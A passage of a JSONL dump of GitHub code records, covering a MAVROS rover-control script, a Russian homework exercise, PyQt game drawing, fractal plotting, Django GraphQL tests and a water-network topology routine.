+\n ' waypoint.frame: ' + str(waypoint.frame) +\n ' waypoint.command: ' + str(waypoint.command) +\n ' waypoint.param1: ' + str(waypoint.param1) +\n ' waypoint.param2: ' + str(waypoint.param2) +\n ' waypoint.param3: ' + str(waypoint.param3) +\n ' waypoint.param4: ' + str(waypoint.param4) +\n ' waypoint.x_lat: ' + str(waypoint.x_lat) +\n ' waypoint.y_long: ' + str(waypoint.y_long) +\n ' waypoint.z_alt: ' + str(waypoint.z_alt) +\n '')\n\n #\n # throttle: Desired PWM value\n #\n def set_throttle(self, throttle):\n \"\"\"Set throttle\"\"\"\n rospy.loginfo('mavros/rc/override, throttle')\n msg = OverrideRCIn()\n msg.channels[THROTTLE_CHANNEL] = throttle # Desired PWM value\n rospy.loginfo(msg)\n self.pub_rc_override.publish(msg)\n\n #\n # servo: Desired PWM value\n #\n def set_servo(self, servo):\n \"\"\"Set servo\"\"\"\n rospy.loginfo('mavros/rc/override, servo')\n msg = OverrideRCIn()\n msg.channels[STEER_CHANNEL] = servo # Desired PWM value\n rospy.loginfo(msg)\n self.pub_rc_override.publish(msg)\n\n #\n # throttle: Desired PWM value\n # servo: Desired PWM value\n #\n def set_throttle_servo(self, throttle, servo):\n \"\"\"Set throttle AND servo\"\"\"\n rospy.loginfo('mavros/rc/override, throttle and servo')\n msg = OverrideRCIn()\n msg.channels[THROTTLE_CHANNEL] = throttle # Desired PWM value\n msg.channels[STEER_CHANNEL] = servo # Desired PWM value\n rospy.loginfo(msg)\n self.pub_rc_override.publish(msg)\n\n #\n # Push waypoints\n #\n def push_waypoints(self, waypoints):\n \"\"\"Push waypoints to Pixhawk\"\"\"\n rospy.loginfo('/mavros/mission/push')\n try:\n resp = self.svc_push_waypoints(waypoints)\n rospy.loginfo(resp)\n return resp\n except rospy.ServiceException as err:\n rospy.loginfo(\n \"Service push_waypoints call failed: %s.\",\n err)\n return None\n\n #\n # Pull waypoints\n # Request update waypoint list.\n #\n def pull_waypoints(self):\n \"\"\"Request update waypoint list\"\"\"\n rospy.loginfo('/mavros/mission/pull')\n try:\n resp = self.svc_pull_waypoints()\n rospy.loginfo('success: ' + str(resp.success) + ' wp_received: ' + str(resp.wp_received))\n return resp\n except rospy.ServiceException as err:\n rospy.loginfo(\n \"Service pull_waypoints call failed: %s.\",\n err)\n return None\n\n #\n # Clear waypoints\n #\n def clear_waypoints(self):\n \"\"\"Clear waypoints\"\"\"\n rospy.loginfo('/mavros/mission/clear')\n try:\n resp = self.svc_clear_waypoints()\n rospy.loginfo(resp)\n return resp\n except rospy.ServiceException as err:\n rospy.loginfo(\n \"Service clear_waypoints call failed: %s.\",\n err)\n return None\n\n #\n # Set current waypoint\n #\n def set_current_waypoint(self, idx):\n \"\"\"Set current wp\"\"\"\n rospy.loginfo('/mavros/mission/set_current: ' + str(idx))\n try:\n resp = self.svc_set_current_waypoint(idx)\n rospy.loginfo(resp)\n return resp\n except rospy.ServiceException as err:\n rospy.loginfo(\n \"Service set_current_waypoint call failed: %s. Index %d could not be set. \"\n \"Check that GPS is enabled.\",\n err, idx)\n return None\n\n #\n # Goto wp\n #\n # def goto_waypoint(self, args):\n # \"\"\"Go to WP\"\"\"\n # wp = Waypoint(\n # frame=args.frame,\n # command=args.command,\n # param1=args.param1,\n # param2=args.param2,\n # param3=args.param3,\n # param4=args.param4,\n # x_lat=args.x_lat,\n # y_long=args.y_long,\n # z_alt=args.z_alt\n # )\n # try:\n # service = rospy.ServiceProxy('mavros/mission/goto', WaypointGOTO)\n # resp = service(waypoint=wp)\n # rospy.loginfo(resp)\n # return resp\n # except rospy.ServiceException, e:\n # rospy.loginfo('Service call failed: {0}'.format(e))\n # return None\n\n def get_param_int(self, name):\n \"\"\"Get parameter value from UAV\"\"\"\n ret = None\n try:\n ret = self.svc_get_param(param_id=name)\n return ret.value.integer\n except rospy.ServiceException as ex:\n rospy.logerr(ex)\n return None\n\n def send_mavros_cmd(self, bool1, msgid, bool2, p0, p1, p2, p3, p4, p5, p6):\n \"\"\"Send a mavros command\"\"\"\n rospy.loginfo(\"/mavros/cmd/command/ %s %s %s %s %s %s %s %s %s %s\",\n str(bool1), str(msgid),\n str(bool2), str(p0),\n str(p1), str(p2), str(p3), str(p4), str(p5), str(p6))\n self._srv_cmd_long(bool1, msgid, bool2, p0, p1, p2, p3, p4, p5, p6)\n\n\nif __name__ == \"__main__\":\n rospy.init_node(\"offb_node_py\")\n\n state_sub = rospy.Subscriber(\"mavros/state\", State, callback=state_cb)\n\n local_pos_pub = rospy.Publisher(\"mavros/setpoint_position/local\", PoseStamped, queue_size=10)\n\n rospy.wait_for_service(\"/mavros/cmd/arming\")\n arming_client = rospy.ServiceProxy(\"mavros/cmd/arming\", CommandBool)\n\n rospy.wait_for_service(\"/mavros/set_mode\")\n set_mode_client = rospy.ServiceProxy(\"mavros/set_mode\", SetMode)\n\n ctrl = UAV_Control()\n\n # Setpoint publishing MUST be faster than 2Hz\n rate = rospy.Rate(20)\n i = 0\n\n # Wait for Flight Controller connection\n while (not rospy.is_shutdown() and not current_state.connected):\n print(current_state.connected)\n rate.sleep()\n\n pose = PoseStamped()\n\n pose.pose.position.x = 0\n pose.pose.position.y = 0\n pose.pose.position.z = 2\n\n # Send a few setpoints before starting\n for i in range(100):\n if (rospy.is_shutdown()):\n break\n\n local_pos_pub.publish(pose)\n rate.sleep()\n\n offb_set_mode = SetModeRequest()\n offb_set_mode.custom_mode = 'MANUAL'\n\n arm_cmd = CommandBoolRequest()\n arm_cmd.value = True\n\n last_req = rospy.Time.now()\n\n while (not rospy.is_shutdown()):\n if (current_state.mode != \"MANUAL\" and (rospy.Time.now() - last_req) > rospy.Duration(5.0)):\n print('setting mode')\n print(f'mode: {current_state.mode}')\n print(f'armed: {current_state.armed}')\n if (set_mode_client.call(offb_set_mode).mode_sent == True):\n rospy.loginfo(\"MANUAL enabled\")\n\n last_req = rospy.Time.now()\n else:\n if (not current_state.armed and (rospy.Time.now() - last_req) > rospy.Duration(5.0)):\n print('arming')\n print(f'mode: {current_state.mode}')\n print(f'armed: {current_state.armed}')\n if (arming_client.call(arm_cmd).success == True):\n rospy.loginfo(\"Vehicle armed\")\n print('Vehicle armed')\n\n last_req = rospy.Time.now()\n # print(pose)\n # local_pos_pub.publish(pose)\n\n from math import floor, sin, pi\n\n ctrl.set_servo(floor(1200 + sin(pi * (i % 300) / 300) * 500))\n\n i += 1\n rate.sleep()\n","repo_name":"DuaneNielsen/offboard","sub_path":"scripts/offb_node.py","file_name":"offb_node.py","file_ext":"py","file_size_in_byte":11594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34388450703","text":"# 2. Петя и Катя – брат и сестра. Петя – студент, а Катя –школьница. Петя помогает Кате по математике. Он задумывает два\n# натуральных числа X и Y (X,Y≤1000), а Катя должна их отгадать. Для этого Петя делает две подсказки. Он называет сумму этих чисел S и их\n# произведение P. Помогите Кате отгадать задуманные Петей числа.\n\n# Пример:\n\n# 4 4 -> 2 2\n# 5 6 -> 2 3\n\np = int(input(\"Сумма этих чисел: \"))\nq = int(input(\"Произведение этих чисел: \"))\n\n# x * x - p * x + q == 0\n\ndisk = p*p - 4 * q\nif disk < 0:\n print(\"Петя обманул Катю - не загадал числа\")\nelif disk == 0:\n print(\"Петя загадал два одинаковых числа: \", int(p/2))\nelif disk > 0:\n x_1 = int((p + disk ** 0.5)/2)\n x_2 = int((p - disk ** 0.5)/2)\n print(\"Первое число: \", x_1, \"второе число: \", x_2)\n","repo_name":"NadezhdaSamoiolova/Python_with_Maria_new","sub_path":"Homework_2/Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"20503991501","text":"# Nova classe para Athlete\nclass AthleteList(list):\n def __init__(self, a_name, a_dob=None, a_times=[]):\n list.__init__([])\n self.name = a_name\n self.dob = a_dob\n self.extend(a_times)\n \n def sanitize(time_string):\n # a função \"sanitize\" é a mesma do módulo 5\n if '-' in time_string:\n splitter = '-'\n elif ':' in time_string:\n splitter = ':'\n else:\n return(time_string)\n (mins, secs) = time_string.split(splitter)\n return(mins + '.' + secs)\n \n def top3(self):\n return(sorted(set([sanitize(t) for t in self]))[0:3])\n \n def get_coach_data(filename):\n try:\n with open(filename) as f:\n data = f.readline()\n templ = data.strip().split(',')\n return AthleteList(templ.pop(0), templ.pop(0), templ)\n except IOError as ioerr:\n print('File error: '+ str(ioerr))\n return(None)","repo_name":"wmfinamore/pyLab","sub_path":"7_desenvolvimento_web/.ipynb_checkpoints/athletelist-checkpoint.py","file_name":"athletelist-checkpoint.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"27692174616","text":"import random\n\nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFontMetrics\n\nMAPSIZE = 600\n\n\nclass Canvas(QtWidgets.QLabel):\n def __init__(self, tile_size):\n super().__init__()\n self.tile_size = tile_size\n pixmap = QtGui.QPixmap(MAPSIZE, MAPSIZE)\n self.setPixmap(pixmap)\n\n def __draw_original_map(self, tiles):\n self.pixmap().fill(Qt.black)\n painter = QtGui.QPainter(self.pixmap())\n pen = QtGui.QPen(Qt.SolidLine)\n pointX = 0\n pointY = 0\n tile_size = self.width() // len(tiles)\n for i in range(len(tiles)):\n for j in range(len(tiles[i])):\n if tiles[i][j] == 0:\n pen.setColor(Qt.black)\n painter.setBrush(QtGui.QBrush(Qt.black, Qt.SolidPattern))\n elif tiles[i][j] == 1:\n pen.setColor(Qt.white)\n painter.setBrush(QtGui.QBrush(Qt.white, Qt.SolidPattern))\n elif tiles[i][j] == 2:\n pen.setColor(Qt.red)\n painter.setBrush(QtGui.QBrush(Qt.red, Qt.SolidPattern))\n elif tiles[i][j] == 3:\n pen.setColor(Qt.green)\n painter.setBrush(QtGui.QBrush(Qt.green, Qt.SolidPattern))\n painter.setPen(pen)\n painter.drawRect(pointX, pointY, tile_size, tile_size)\n if ((i == 2) and (j == 1)) or ((i == 1) and (j == 2)) or ((i == (len(tiles) - 2)) and (j == (len(tiles) - 3))) or ((i == (len(tiles) - 2)) and (j == (len(tiles) - 3))):\n pass\n else:\n self.__draw_narrow_spot(tiles, i, j, tile_size, pointX, pointY, painter)\n pointX = pointX + tile_size\n pointX = 0\n pointY = pointY + tile_size\n painter.end()\n\n def __draw_narrow_spot(self, tiles, i, j, tile_size, pointX, pointY, painter):\n right = False\n left = False\n top = False\n bot = False\n nb = 0\n if tiles[i][j] == 1 and (tile_size > 15):\n rand_int = random.randint(0, 100)\n if rand_int < 20:\n if (j < len(tiles) - 2) and (tiles[i][j + 1] == 1):\n right = True\n nb = nb + 1\n if (j > 2) and (tiles[i][j - 1] == 1):\n left = True\n nb = nb + 1\n if (i < len(tiles) - 2) and (tiles[i + 1][j] == 1):\n bot = True\n nb = nb + 1\n if (i > 2) and (tiles[i - 1][j] == 1):\n top = True\n nb = nb + 1\n if nb != 2:\n pass\n painter.setPen(QtGui.QPen(Qt.black, Qt.SolidLine))\n painter.setBrush(QtGui.QBrush(Qt.black, Qt.SolidPattern))\n black_zone = tile_size // 3\n if left and right:\n painter.drawRect(pointX, pointY, tile_size, black_zone)\n painter.drawRect(pointX, pointY + 2 * black_zone, tile_size, tile_size)\n elif top and bot:\n painter.drawRect(pointX, pointY, black_zone, tile_size)\n painter.drawRect(pointX + 2 * black_zone, pointY, tile_size, tile_size)\n elif top and left:\n painter.drawRect(pointX, pointY, black_zone, black_zone)\n painter.drawRect(pointX + 2 * black_zone, pointY, tile_size, tile_size)\n painter.drawRect(pointX, pointY + 2 * black_zone, tile_size, tile_size)\n elif top and right:\n painter.drawRect(pointX, pointY, black_zone, tile_size)\n painter.drawRect(pointX + 2 * black_zone, pointY, tile_size, black_zone)\n painter.drawRect(pointX, pointY + 2 * black_zone, tile_size, tile_size)\n elif bot and left:\n painter.drawRect(pointX, pointY, tile_size, black_zone)\n painter.drawRect(pointX, pointY + 2 * black_zone, black_zone, tile_size)\n painter.drawRect(pointX + 2 * black_zone, pointY, tile_size, tile_size)\n elif bot and right:\n painter.drawRect(pointX, pointY, tile_size, black_zone)\n painter.drawRect(pointX, pointY, black_zone, tile_size)\n painter.drawRect(pointX + 2 * black_zone, pointY + 2 * black_zone, tile_size, tile_size)\n\n def draw_map(self, tiles):\n self.__draw_original_map(tiles)\n\n def __write_info_on_screen(self, text):\n painter = QtGui.QPainter(self.pixmap())\n font = painter.font()\n font.setPixelSize(48)\n painter.setFont(font)\n pointX = round(MAPSIZE / 2)\n pointY = pointX\n fm = QFontMetrics(font)\n text_width = fm.width(text) / 2\n text_height = fm.height() / 2\n rectangle = QtCore.QRect(pointX - text_width, pointY - text_height, pointX + text_width, pointY + text_height)\n painter.drawText(rectangle, 0, text)\n\n def __clear_canvas(self):\n painter = QtGui.QPainter(self.pixmap())\n pen = QtGui.QPen()\n pen.setWidth(MAPSIZE)\n pointX = round(MAPSIZE / 2)\n pointY = pointX\n pen.setColor(Qt.white)\n painter.setPen(pen)\n painter.drawPoint(pointX, pointY)\n painter.end()\n\n def show_loading_map_info(self):\n self.__clear_canvas()\n self.__write_info_on_screen(\"Generowanie mapy...\")\n\n def __write_main_info_on_screen(self, text):\n painter = QtGui.QPainter(self.pixmap())\n font = painter.font()\n font.setPixelSize(48)\n painter.setFont(font)\n pointX = round(MAPSIZE / 2)\n pointY = pointX\n fm = QFontMetrics(font)\n text_width = fm.width(text) / 2\n text_height = fm.height() / 2\n rectangle = QtCore.QRect(pointX - text_width, pointY - 3 * text_height, pointX + text_width, pointY - text_height)\n painter.drawText(rectangle, 0, text)\n painter.end()\n\n def show_won_map_info(self):\n self.__clear_canvas()\n self.__write_main_info_on_screen(\"Wygrana!\")\n self.__write_info_on_screen(\"Generowanie mapy...\")\n\n def show_lost_map_info(self):\n self.__clear_canvas()\n self.__write_main_info_on_screen(\"Porażka!\")\n self.__write_info_on_screen(\"Generowanie mapy...\")\n","repo_name":"laki94/MouseRunner","sub_path":"MapCanvas.py","file_name":"MapCanvas.py","file_ext":"py","file_size_in_byte":6450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34709114842","text":"# D). Based on this survey, what will be the most desired programming language forthe year 2020?\n\nlanguage_desired = data1[data1['LanguageDesireNextYear'].notnull()]\nunique_lang={}\nunique_lang\n\ndef plot_dimension_count (unique_dim_dict, plot_title):\n dim_count = pd.DataFrame.from_dict(unique_dim_dict, orient='index', dtype=None)\n dim_count.columns= ['Count']\n dim_count.sort_values('Count', ascending=True, inplace=True)\n dim_count.plot(kind = 'barh', figsize = (12,12), fontsize = 10, title =plot_title,color='c');\n\n plot_dimension_count(unique_lang, 'The Most Popular Languages')\n\n ","repo_name":"satyamgupta8340/pythonassignment6","sub_path":"assign6qD.py","file_name":"assign6qD.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"37465218998","text":"# -*- coding: utf-8 -*-\n# +\nfrom __future__ import print_function\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle \nfrom ipywidgets import interact, interactive, fixed, interact_manual, Layout\nimport ipywidgets as widgets\nimport numpy as np\nfrom math import sin, cos, pi, atan2\nfrom random import randint \nfrom pylab import *\nimport warnings\nwarnings.filterwarnings('ignore')\n\n#Función que realiza la transformación\n#recibe la matriz M, la multiplica por X\n#y le suma t.\ndef transafin(M,t,x):\n y=M@x+t\n return y\n\n#Función que gráfica el triángulo de Sierpinsky.\n#Como ejemplo de un algoritmo determinista.\ndef sierpinsky():\n fig=plt.figure()\n ax=plt.gca()\n Tri=np.array([[0,0]])\n for i in range(8):\n tritrans=np.array([transafin([[0.5,0],[0,0.5]],[0,0],i) for i in Tri])\n tritrans2=np.array([transafin([[0.5,0],[0,0.5]],[0,0.5],i) for i in Tri])\n tritrans3=np.array([transafin([[0.5,0],[0,0.5]],[0.5,0],i) for i in Tri])\n Tri=np.concatenate((tritrans,tritrans2,tritrans3))\n plt.scatter(Tri.transpose()[0],Tri.transpose()[1],color='black',s=0.2)\n ax.set_xticks(np.arange(-0.2,1.4,0.2))\n ax.set_yticks(np.arange(-0.2,1.4,0.2))\n plt.grid()\n ax.axis(\"equal\")\n\n#Función que gráfica el helecho (Fern).\n#Como ejemplo de un algoritmo aleatorio.\ndef fern():\n # Inicializa las listas x e y\n x = [] \n y = [] \n\n # Inicializa el primer elemento de cada una en 0 \n x.append(0) \n y.append(0) \n\n current = 0\n\n for i in range(1, 50000): \n\n # genera un entero aleatorio entre 1 y 100\n z = randint(1, 100) \n\n # las coordenadas de x e y de las ecuaciones\n # son agregadas a la lista.\n\n # probabilidad de 0.16 \n if z == 1: \n x.append(0) \n y.append(0.16*(y[current])) \n\n # probabilidad de 0.85\n if z>= 2 and z<= 86: \n x.append(0.85*(x[current]) + 0.04*(y[current])) \n y.append(-0.04*(x[current]) + 0.85*(y[current])+1.6) \n\n # probabilidad del 0.07\n if z>= 87 and z<= 93: \n x.append(0.2*(x[current]) - 0.26*(y[current])) \n y.append(0.23*(x[current]) + 0.22*(y[current])+1.6) \n\n # probabilidad de 0.07 \n if z>= 94 and z<= 100: \n x.append(-0.15*(x[current]) + 0.28*(y[current])) \n y.append(0.26*(x[current]) + 0.24*(y[current])+0.44) \n\n current = current + 1\n\n plt.scatter(x, y, s = 0.2, edgecolor ='green') \n plt.axis(\"equal\")\n plt.show() \n \n#Función que grafica el copo de Koch\n#lado es el tamaño de la línea y n\n#el número de interaciones.\ndef copoVonKoch(lado, n):\n x_vertice1 = 0\n y_vertice1 = 0\n\n x_vertice2 = lado * cos(2 * pi / 3)\n y_vertice2 = lado * sin(2 * pi / 3)\n\n x_vertice3 = lado * cos(pi / 3)\n y_vertice3 = lado * sin(pi / 3)\n\n curvaVonKoch(x_vertice1, y_vertice1, x_vertice2, y_vertice2, n)\n curvaVonKoch(x_vertice2, y_vertice2, x_vertice3, y_vertice3, n)\n curvaVonKoch(x_vertice3, y_vertice3, x_vertice1, y_vertice1, n)\n\n#Función recursiva que grafica la curva de Koch\n#Recibe las coordenadas iniciales y finales y las dibuja\n#cuando el valor de n es igual a cero.\ndef curvaVonKoch(xi, yi, xf, yf, n):\n if n == 0:\n plot([xi, xf], [yi, yf], lw=1.0, color='b')\n elif n > 0:\n x1 = xi + (xf - xi) / 3.0\n y1 = yi + (yf - yi) / 3.0\n\n x3 = xf - (xf - xi) / 3.0\n y3 = yf - (yf - yi) / 3.0\n\n radio = hypot(x3 - x1, y3 - y1)\n alpha = atan2((y3 - y1), (x3 - x1))\n alpha += pi / 3.0\n x2 = x1 + radio * cos(alpha)\n y2 = y1 + radio * sin(alpha)\n\n curvaVonKoch(xi, yi, x1, y1, n - 1)\n curvaVonKoch(x1, y1, x2, y2, n - 1)\n curvaVonKoch(x2, y2, x3, y3, n - 1)\n curvaVonKoch(x3, y3, xf, yf, n - 1)\n\n#Función que grafica la curva de Koch y el \n#copo de Koch.\ndef koch(lado, n):\n axes().set_xlim(0, lado)\n axes().set_ylim(-2, lado / 2.0)\n axes().set_aspect(1.0)\n title('Curva De Von Koch')\n xlim(0, lado)\n curvaVonKoch(0, 0, lado, 0, n)\n show()\n axes().set_xlim(-lado, lado)\n axes().set_ylim(-2, lado + 0.5 * lado)\n axes().set_aspect(1.0)\n title('Copo De Nieve De Koch')\n xlim(-lado, lado)\n copoVonKoch(lado, n)\n show()\n\n#Función recursiva que dibuja la alfonbra de \n#Sierpinksy.\ndef spski_carpet(ax, p, n, size):\n if n > 0:\n ax.add_patch(Rectangle((p[0, 0] - size / 6,\n p[1, 0] - size / 6),\n size / 3, size / 3,\n facecolor=(0.5, 0.5, 0.5),\n linewidth=0))\n q = np.array([[-size / 3], [-size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[-size / 3], [0]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[-size / 3], [size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[0], [-size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[0], [size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[size / 3], [-size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[size / 3], [0]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[size / 3], [size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n\n#Función que grafica la alfombra de Sierpinsky.\ndef sierpinski_carpet():\n fig = plt.figure()\n fig.patch.set_facecolor('white')\n ax = plt.gca()\n p = np.array([[0], [0]])\n spski_carpet(ax, p, 4, 1)\n ax.add_patch(Rectangle((-1 / 2, -1 / 2), 1, 1,\n fill=False , edgecolor=(0, 0, 0),\n linewidth=0.5))\n plt.axis('equal')\n plt.axis('off')\n plt.show()\n","repo_name":"c4ttivo/c4ttivo.github.io","sub_path":"iterados.py","file_name":"iterados.py","file_ext":"py","file_size_in_byte":5823,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8138187927","text":"import numpy as np\nimport time\nimport os\n\ndef create_trace_path(args):\n if not os.path.exists(args.trace_dir):\n os.makedirs(args.trace_dir)\n return f'{args.trace_dir}/{args.traffic},{args.spatial}_{args.n_node}_{args.n_step}.npz'\n\ndef create_spatial_p(args):\n if args.spatial == 'highlow':\n spatial_pdf = []\n for i in range(args.n_node):\n if np.random.rand() < 1 / 5:\n spatial_pdf.append(0.3 / 6)\n else:\n spatial_pdf.append(0.025 / 6)\n return np.array(spatial_pdf)\n elif args.spatial == 'uniform':\n return np.random.rand(args.n_node)\n else:\n raise NotImplementedError\n\ndef generate_trace(args):\n args.n_step = args.n_test_step\n # initialize trace\n T = args.n_step * args.coherrent_time * args.n_test_episode\n T_episode = args.n_step * args.coherrent_time\n N = args.n_node\n trace = np.zeros([T, N], dtype=np.uint8)\n spatial_ps = []\n\n for t in range(0, T):\n # compute spatial pdf\n if t % T_episode == 0:\n spatial_p = create_spatial_p(args)\n spatial_ps.append(spatial_p)\n trace[t, :] = np.random.poisson(lam=args.lamda * spatial_p)\n # save\n print('[+] saving')\n path = create_trace_path(args)\n tic = time.time()\n data = {\n 'spatial_ps' : np.array(spatial_ps),\n 'trace': trace,\n }\n np.savez_compressed(path, **data)\n print(f' {time.time() - tic:0.1}(s)')","repo_name":"lethanh-96/tinyqmix-mtc","sub_path":"scenario/generate_trace.py","file_name":"generate_trace.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"}
+{"seq_id":"13050988723","text":"import pytest\n\nfrom .factories import UserFactory\nfrom project.util.testing_util import GraphQLTestingPal\n\n\nclass TestSendVerificationEmail:\n @pytest.fixture(autouse=True)\n def setup_fixture(self, graphql_client):\n self.graphql_client = graphql_client\n\n def execute(self, user, email):\n if user:\n self.graphql_client.request.user = user\n return self.graphql_client.execute(\n \"\"\"\n mutation {\n sendVerificationEmail(input:{email: \"%s\"}) {\n errors { field, messages },\n session { email, isEmailVerified }\n }\n }\n \"\"\"\n % email\n )[\"data\"][\"sendVerificationEmail\"]\n\n def test_it_requires_login(self):\n assert self.execute(None, \"boop@jones.com\")[\"errors\"] == [\n {\"field\": \"__all__\", \"messages\": [\"You do not have permission to use this form!\"]}\n ]\n\n def test_does_not_reset_verified_when_email_is_unchanged(self, db, mailoutbox):\n user = UserFactory(email=\"boop@jones.com\", is_email_verified=True)\n assert self.execute(user, \"boop@jones.com\") == {\n \"errors\": [],\n \"session\": {\"email\": \"boop@jones.com\", \"isEmailVerified\": True},\n }\n assert len(mailoutbox) == 1\n assert mailoutbox[0].recipients() == [\"boop@jones.com\"]\n\n def test_it_resets_verified_when_email_changes(self, db, mailoutbox):\n user = UserFactory(email=\"old@email.com\", is_email_verified=True)\n assert self.execute(user, \"blap@jones.com\") == {\n \"errors\": [],\n \"session\": {\"email\": \"blap@jones.com\", \"isEmailVerified\": False},\n }\n assert len(mailoutbox) == 1\n assert mailoutbox[0].recipients() == [\"blap@jones.com\"]\n\n\nclass TestPhoneNumber(GraphQLTestingPal):\n QUERY = \"\"\"\n mutation PhoneNumber($input: PhoneNumberInput!) {\n output: phoneNumber(input: $input) {\n errors { field, messages },\n session { phoneNumber }\n }\n }\n \"\"\"\n\n DEFAULT_INPUT = {\n \"phoneNumber\": \"\",\n }\n\n def test_it_requires_login(self):\n self.assert_one_field_err(\"You do not have permission to use this form!\")\n\n def test_it_works(self):\n user = UserFactory(phone_number=\"5551234567\")\n self.set_user(user)\n res = self.execute({\"phoneNumber\": \"6149951231\"})\n assert res == {\"errors\": [], \"session\": {\"phoneNumber\": \"6149951231\"}}\n user.refresh_from_db()\n assert user.phone_number == \"6149951231\"\n","repo_name":"JustFixNYC/tenants2","sub_path":"users/tests/test_schema.py","file_name":"test_schema.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"71"}
+{"seq_id":"72080838631","text":"#!/usr/bin/python3\nimport os\nimport os.path\nimport shutil\nfrom pprint import pprint\n\nfrom nsb_config import options\nfrom nsb_config import default_global_path\nimport nsb_twitter\nimport cotn_twitter\n\n\ndef main():\n debug = options['debug']\n dry_run = options['dry-run']\n\n \n if options['twitter_keys'] != None:\n twitter = nsb_twitter.twitter(options['twitter_keys'])\n else:\n twitter = None\n \n\n\n if options['action'] == 'init':\n print('copying', default_global_path, 'to', options['config'])\n if not options['dry-run']:\n shutil.copy(default_global_path, options['config'])\n \n elif options['action'] == 'update':\n cotn_twitter.update(twitter)\n \n elif options['action'] == 'postDaily':\n cotn_twitter.postYesterday(twitter)\n\n elif options['action'] == 'printBoard':\n cotn_twitter.printBoard()\n\n elif options['action'] == 'none':\n print(\"exiting\")\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jakkdl/necro_score_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"}
+{"seq_id":"7968769035","text":"\"\"\"\nThe tsnet.network.topology figure out the topology, i.e.,\nupstream and downstream adjacent links for each pipe, and\nstore the information in lists.\n\n\"\"\"\nimport wntr\n\ndef topology(wn):\n \"\"\"Figure out the topology of the network\n\n Parameters\n ----------\n wn : wntr.network.model.WaterNetworkModel\n .inp file used for EPAnet simulation\n npipe : integer\n Number of pipes\n\n Returns\n -------\n links1 : list\n The id of adjacent pipe on the start node.\n The sign represents the direction of the pipe.\n + : flowing into the junction\n - : flowing out from the junction\n links2 : list\n The id of adjacent pipe on the end node.\n The sign represents the direction of the pipe.\n + : flowing into the junction\n - : flowing out from the junction\n utype : list\n The type of the upstream adjacent links.\n If the link is not pipe, the name of that link\n will also be included.\n If there is no upstream link, the type of the start node\n will be recorded.\n dtype : list\n The type of the downstream adjacent links.\n If the link is not pipe, the name of that link\n will also be included.\n If there is no downstream link, the type of the end node\n will be recorded.\n \"\"\"\n npipe = wn.num_pipes\n length = wn.query_link_attribute('length')\n if wntr.__version__>= '0.2.2':\n G = wn.get_graph(link_weight = length)\n else:\n G = wn.get_graph()\n G.weight_graph(link_attribute = length)\n\n # add 'id' attribute to networkx links\n i =1\n for ln, link in wn.links():\n G.edges[link.start_node_name,link.end_node_name, ln]['id'] = i\n i+=1\n\n # allocate the parameters\n links1 = [0] * len(wn.links)\n links2 = [0] * len(wn.links)\n utype = [('Pipe',0)] * npipe\n dtype = [('Pipe',0)] * npipe\n\n # Adjcant pipes for each pipe IN:+; OUT:-\n for _, link in wn.links():\n pn = link.id\n links1[int(pn)-1] = [int(p['id'])\n for _, attr in G.pred[link.start_node_name].items()\n for _,p in attr.items()\n if p['id'] != pn]\n\n for _, attr in G.succ[link.start_node_name].items() :\n for _,p in attr.items():\n if p['id'] != pn:\n links1[int(pn)-1].append(-1* int(p['id']))\n\n\n # right (end) adjcant pipes\n links2[int(pn)-1] = [int(p['id'])\n for _, attr in G.pred[link.end_node_name].items()\n for _,p in attr.items()\n if p['id'] != pn]\n\n for _, attr in G.succ[link.end_node_name].items():\n for _,p in attr.items():\n if p['id'] != pn:\n links2[int(pn)-1].append(-1*int(p['id']))\n\n #figure out downstream type and upstream type\n for _,pipe in wn.pipes():\n pn = pipe.id-1\n if links1[pn] :\n if max(map(abs, links1[pn])) > npipe:\n utype[pn] = [(l.link_type,l.name)\n for _,l in wn.links()\n if l.id == abs(links1[pn][0])][0]\n\n if links1[abs(links1[pn][0])-1] and links2[abs(links1[pn][0])-1]:\n links1[pn] = [i\n for i in [links1[abs(links1[pn][0])-1], links2[abs(links1[pn][0])-1]]\n if abs(i[0]) -1 != pn][0]\n else:\n links1[pn] = ['End']\n\n else:\n utype[pn] = (wn.nodes[pipe.start_node_name].transient_node_type,\n wn.nodes[pipe.start_node_name])\n\n if links2[pn] :\n if max(map(abs, links2[pn])) > npipe:\n dtype[pn] = [(l.link_type,l.name)\n for _,l in wn.links()\n if l.id == abs(links2[pn][0])][0]\n\n if links1[abs(links2[pn][0])-1] and links2[abs(links2[pn][0])-1]:\n links2[pn] = [i\n for i in [links1[abs(links2[pn][0])-1], links2[abs(links2[pn][0])-1]]\n if abs(i[0]) -1 != pn][0]\n else:\n links2[pn] = ['End']\n\n else:\n dtype[pn] = 